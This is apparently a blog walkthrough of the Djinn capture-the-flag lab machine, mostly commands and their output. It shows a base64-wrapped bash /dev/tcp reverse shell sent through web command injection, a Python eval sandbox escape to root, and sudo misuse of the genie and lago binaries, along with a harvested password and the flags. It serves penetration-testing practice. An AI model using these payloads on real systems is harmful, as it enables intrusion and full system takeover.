LifesFun's 101
"The only true wisdom is in knowing you know nothing." - Socrates
Djinn Walkthrough
07 Dec 2019
Djinn is a vulnerable CTF style machine from Hack the Box. It’s supposed to be Beginner-Intermediate level. The point of the challenge is to get user and root flags. This machine presents different privilege escalation vectors, and definitely teaches you some unconventional new stuff.
Vulnerable System: Djinn
Operating System: Ubuntu 18.04
Kernel: 4.15.0
Methodology
-
Host Discovery (netdiscover)
-
Port Scanning (nmap)
-
FTP Enumeration (ftp)
-
Port 1337 Enumeration (nc)
-
Web Port Enumeration (gobuster, browser)
-
Low Privilege Exploitation (Website Code Injection, bash, base64, nc)
-
Privilege Escalation Route 1 (python eval function, nc)
-
Privilege Escalation Route 2 (man, file, cat, strings, uncompyle6)
Reconnaissance
Host Discovery (Netdiscover)
lifesfun:~/vulnhub/djinn# netdiscover -r 192.168.211.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
16 Captured ARP Req/Rep packets, from 3 hosts. Total size: 960
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.211.1 00:50:56:c0:00:01 6 360 VMware, Inc.
192.168.211.145 00:0c:29:51:a0:46 7 420 VMware, Inc.
192.168.211.254 00:50:56:e6:d6:28 3 180 VMware, Inc.
Port Scanning (Nmap)
All Ports Scan
lifesfun:~/vulnhub/djinn# nmap -p- 192.168.211.145
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 01:30 EST
Nmap scan report for 192.168.211.145
Host is up (0.00081s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:51:A0:46 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds
Aggressive, Version and Default Script Scan.
lifesfun:~/vulnhub/djinn# nmap -A -sV -sC -p 21,22,1337,7331 192.168.211.145
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 01:33 EST
Nmap scan report for 192.168.211.145
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.211.146
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '+', 9)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 7)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
MAC Address: 00:0C:29:51:A0:46 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.88 ms 192.168.211.145
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.73 seconds
FTP Enumeration (ftp)
lifesfun:~/vulnhub/djinn# ftp 192.168.211.145
Connected to 192.168.211.145.
220 (vsFTPd 3.0.3)
Name (192.168.211.145:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (122.0703 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.00 secs (1.7439 MB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (1.0463 MB/s)
ftp> exit
221 Goodbye.
Nothing interesting was found in FTP.
Port 1337 Enumeration (nc)
lifesfun:~# nc -nv 192.168.211.145 1337
(UNKNOWN) [192.168.211.145] 1337 (?) open
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(5, '+', 9)
> 14
(3, '*', 6)
> 18
(8, '+', 3)
> 11
Looks like some sort of game.
Web Port Enumeration (7331)
Gobuster
lifesfun:~/vulnhub/djinn# gobuster dir -u http://192.168.211.145:7331 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.211.145:7331
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/12/01 01:50:51 Starting gobuster
===============================================================
/wish (Status: 200)
/genie (Status: 200)
===============================================================
2019/12/01 01:58:28 Finished
===============================================================
Browser Enumeration
Home Page.
/wish page
This page hints onto possible command injection.
Attempting command injection by typing whoami and pressing Submit.
As can be seen whoami is executed correctly and the current user (www-data) is displayed in the url.
Low Privilege Exploitation (Nitish)
Next, bash reverse one liner from pentestmonkey’s blog can be used to get reverse shell. (It took a bit of trial and error to see which characters and commands were being escaped). The shell needed to be encoded with base64 then decoded with base64 and piped into bash.
Original Reverse Shell:
bash -i >& /dev/tcp/192.168.211.146/443 0>&1
Encoded Reverse Shell:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xNDYvNDQzIDA+JjEK | base64 -d | bash
Catching & Upgrading Reverse Shell
lifesfun:~# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.211.146] from (UNKNOWN) [192.168.211.145] 43218
bash: cannot set terminal process group (719): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ python -c "import pty; pty.spawn('/bin/bash')"
python -c "import pty; pty.spawn('/bin/bash')"
www-data@djinn:/opt/80$ echo $HOSTNAME
echo $HOSTNAME
djinn
Discovering Possible Credentials
www-data@djinn:/opt/80$ ls
ls
app.py app.pyc static templates
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess
from flask import Flask, redirect, render_template, request, url_for
app = Flask(__name__)
app.secret_key = "key"
CREDS = "/home/nitish/.dev/creds.txt"
www-data@djinn:/opt/80$ cat /home/nitish/.dev/creds.txt
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
Switching to nitish user and obtaining user flag.
www-data@djinn:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:/opt/80$ cd /home/nitish
cd /home/nitish
nitish@djinn:~$ ls
ls
user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
Privilege Escalation (Rooute #1)
Enumerating for Possible Escalation Vector.
nitish@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
It looks like nitish can run /usr/bin/genie as the user sam.
nitish@djinn:/opt/80$ ls -laht /usr/bin/genie
ls -laht /usr/bin/genie
-rwsr-x--- 1 sam nitish 71K Nov 11 19:09 /usr/bin/genie
Let’s check out the help for the executable.
nitish@djinn:/opt/80$ genie -h
genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
I know you've came to me bearing wishes in mind. So go ahead make your wishes.
positional arguments:
wish Enter your wish
optional arguments:
-h, --help show this help message and exit
-g, --god pass the wish to god
-p SHELL, --shell SHELL
Gives you shell
-e EXEC, --exec EXEC execute command
Attempt is made to escalate with genie binary.
nitish@djinn:~$ sudo -u sam /usr/bin/genie -p "/bin/bash"
sudo -u sam /usr/bin/genie -p "/bin/bash"
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish
nitish@djinn:~$ sudo -u sam /usr/bin/genie -p "/bin/sh"
sudo -u sam /usr/bin/genie -p "/bin/sh"
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish
nitish@djinn:~$ genie whoami -p /bin/bash -e /bin/bash
genie whoami -p /bin/bash -e /bin/bash
nitish@djinn:/opt/80$ sudo -u sam genie -p "/bin/bash" -g wish
sudo -u sam genie -p "/bin/bash" -g wish
We've added your wish to our records.
Continue praying!!
As I could not get far with the genie executable I tried searching elsewhere. Considering that the app.py was written in python, I thought that port 1337 app might be written in python too.
After a little bit of digging I found this article, https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/ .
First, let’s start with something easy - whoami, as it turns out the program was running with root privileges.
lifesfun:~# nc -nv 192.168.211.145 1337
(UNKNOWN) [192.168.211.145] 1337 (?) open
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(6, '+', 1)
> eval('__import__("os").system("whoami")')
root
Wrong answer
Next the same encoding was used to get a reverse root shell as the initial user shell.
lifesfun:~# nc -nv 192.168.211.145 1337
(UNKNOWN) [192.168.211.145] 1337 (?) open
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(6, '+', 9)
> eval('__import__("os").system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xNDYvNDQzIDA+JjEK | base64 -d | bash")')
Catching Reverse Shell
lifesfun:~# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.211.146] from (UNKNOWN) [192.168.211.145] 46628
bash: cannot set terminal process group (20312): Inappropriate ioctl for device
bash: no job control in this shell
root@djinn:/# whoami
whoami
root
Root Flag
root@djinn:/# cd /root
cd /root
root@djinn:/root# ls
ls
lago
proof.sh
root@djinn:/root# bash proof.sh
bash proof.sh
TERM environment variable not set.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Sat Dec 7 02:57:17 IST 2019
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
root@djinn:/root#
------------------------------------------------------------------------------------------------
Privilege Escalation (Rooute #2)
A fellow hacker (cyberbot) told me to check out the man page for the executable, so let’s check it out.
nitish@djinn:/opt/80$ man genie
man genie
WARNING: terminal is not fully functional
- (press RETURN)
man(8) genie man page man(8)
NAME
genie - Make a wish
SYNOPSIS
genie [-h] [-g] [-p SHELL] [-e EXEC] wish
DESCRIPTION
genie would complete all your wishes, even the naughty ones.
We all dream of getting those crazy privelege escalations, this will
even help you acheive that.
OPTIONS
wish
This is the wish you want to make .
-g, --god
Sometime we all would like to make a wish to god, this option
let you make wish directly to God;
Though genie can't gurantee you that your wish will be heard by
God, he's a busy man you know;
-p, --shell
Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"
-e, --exec
Execute command on someone else computer is just too damn fun,
but this comes with some restrictions.
-cmd
You know sometime all you new is a damn CMD, windows I love you.
SEE ALSO
mzfr.github.io
BUGS
There are shit loads of bug in this program, it's all about finding
one.
AUTHOR
mzfr
1.0 11 November 2019 man(8)
It looks like there’s a flag -cmd that was not present in the help output.
When trying to use cmd flag it seems to open a new shell.
nitish@djinn:/opt/80$ genie -cmd whoami
genie -cmd whoami
my man!!
$ whoami
whoami
nitish
$ exit
exit
You are a noob hacker!!
Low Privilege Exploitation (sam)
Next, executing it as user sam, gives us shell as sam user.
nitish@djinn:/opt/80$ sudo -u sam genie -cmd whoami
sudo -u sam genie -cmd whoami
my man!!
$ whoami
whoami
sam
Upgrading the shell to TTY.
$ python -c "import pty;pty.spawn('/bin/bash')"
Further Enumeration.
sam@djinn:/home/sam$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
Looks like another executable. Let’s try and run it.
sam@djinn:/home/sam$ sudo /root/lago
sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: 39
39
Better Luck next time
Next, let’s try and enumerate it.
When trying to enumerate the executable with strings command, permission denied message popped up.
sam@djinn:/home/sam$ strings /root/lago
strings /root/lago
strings: Warning: could not locate '/root/lago'. reason: Permission denied
However, in sam’s home directory there is a file called .pyc, which seems to be a copy of the same binary.
sam@djinn:/home/sam$ ls -laht
ls -laht
total 36K
drwxr-x--- 4 sam sam 4.0K Nov 14 21:11 .
-rw------- 1 root root 417 Nov 14 20:59 .bash_history
drwxr-xr-x 4 root root 4.0K Nov 14 19:50 ..
drwx------ 2 sam sam 4.0K Nov 11 19:28 .cache
-rw-r--r-- 1 sam sam 0 Nov 7 20:20 .sudo_as_admin_successful
-rw-r--r-- 1 sam sam 1.8K Nov 7 18:44 .pyc
drwx------ 3 sam sam 4.0K Oct 20 23:36 .gnupg
-rw-r--r-- 1 root root 220 Oct 20 23:33 .bash_logout
-rw-r--r-- 1 sam sam 3.7K Oct 20 23:33 .bashrc
-rw-r--r-- 1 sam sam 807 Oct 20 23:33 .profile
Compiled File Enumeration (file, cat, strings, SimpleHTTPServer, uncomyple6)
Using file command to find out the type of file it is.
sam@djinn:/home/sam$ file .pyc
.pyc: python 2.7 byte-compiled
Looks like it’s python compiled file.
Next, cat can be used to enumerate further.
sam@djinn:/home/sam$ cat .pyc
cat .pyc
�
��]c@s}ddlmZddlmZddlmZd�Zd�Zd�d�Z �Z
e
d krye
e ��nd
S(
i����(tgetuser(tsystem(trandintcCs dGHdS(NsWorking on it!! ((((s/home/mzfr/scripts/exp.pyt
naughtyboscCsBtdd�}dGHtd�}||kr9td�ndGHdS(Niies"Choose a number between 1 to 100: sEnter your number: s/bin/shsBetter Luck next time(RtinputR(tnumts((s/hsme/mzfr/scripts/exp.pytguessit
cCs(t�}td�}d||fGHdS(Ns$Enter the full of the file to read: s!User %s is not allowed to read %s(RR(tusertpath((s/home/mzfr/scripts/exp.pyt readfiless
cCs/dGHdGHdGHdGHdGHttd��}|S(NsWhat do you want to do ?s1 - Be naughtys2 - Guess the numbers3 - Read some damn files4 - WorksEnter your choice: (tintR(tchoice((s/home/mzfr/scripts/exp.pytoptionsscCs_|dkrt�nE|dkr,t�n/|dkrBt�n|dkrVdGHndGHdS(Niiiiswork your ass off!!s"Do something better with your life(RRR
(top((s/home/mzfr/scripts/exp.pytmain's
__main__N(
tgetpassRtosRtrandomRRRR
R__name__(((s/home/mzfr/scripts/exp.py<module>s
From a portion of the output (Enter your number: s/bin/shsBetter Luck next time(RtinputR(tnumts((s/hsme/mzfr/scripts/exp.pytguessit) it looks like the number option might be the possible way to obtain the shell.
Next strings command is ran on the .pyc file.
sam@djinn:/home/sam$ strings .pyc
strings .pyc
getuser(
system(
randintc
Working on it!! (
/home/mzfr/scripts/exp.pyt
naughtyboi
Choose a number between 1 to 100: s
Enter your number: s
/bin/shs
Better Luck next time(
inputR
numt
/home/mzfr/scripts/exp.pyt
guessit
Enter the full of the file to read: s!
User %s is not allowed to read %s(
usert
path(
/home/mzfr/scripts/exp.pyt
readfiles
What do you want to do ?s
1 - Be naughtys
2 - Guess the numbers
3 - Read some damn filess
4 - Works
Enter your choice: (
intR
choice(
/home/mzfr/scripts/exp.pyt
options
work your ass off!!s"
Do something better with your life(
/home/mzfr/scripts/exp.pyt
main'
__main__N(
getpassR
randomR
__name__(
/home/mzfr/scripts/exp.pyt
<module>
Furthermore, Python simple web server can be launched from Sam’s home directory and then the file can be downloaded to the host for further enumeration.
sam@djinn:/home/sam$ python -m SimpleHTTPServer
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.211.146 - - [08/Dec/2019 23:29:26] "GET /.pyc HTTP/1.1" 200 -
192.168.211.146 - - [08/Dec/2019 23:31:43] "GET /.pyc HTTP/1.1" 200 -
lifesfun:~/vulnhub/djinn# wget http://192.168.211.145:8000/.pyc
--2019-12-08 13:01:43-- http://192.168.211.145:8000/.pyc
Connecting to 192.168.211.145:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1749 (1.7K) [application/octet-stream]
Saving to: ‘.pyc’
.pyc 100%[===================>] 1.71K --.-KB/s in 0s
2019-12-08 13:01:43 (155 MB/s) - ‘.pyc’ saved [1749/1749]
Once downloaded uncompyle6 python tool was used to decompile the file, which presented the following:
lifesfun:~/vulnhub/djinn# uncompyle6 .pyc
# uncompyle6 version 3.5.1
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.17 (default, Oct 19 2019, 23:36:22)
# [GCC 9.2.1 20191008]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 08:05:18
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num: <<<-----------------------
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
As can be seen from the code output Guess the Number part needs string ‘num’ in order to provide root shell.
Once the string is entered, the root shell is obtained.
sam@djinn:/home/sam$ sudo /root/lago
sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# whoami
whoami
root
bash proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Sun Dec 8 02:14:10 IST 2019
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
comments powered by Disqus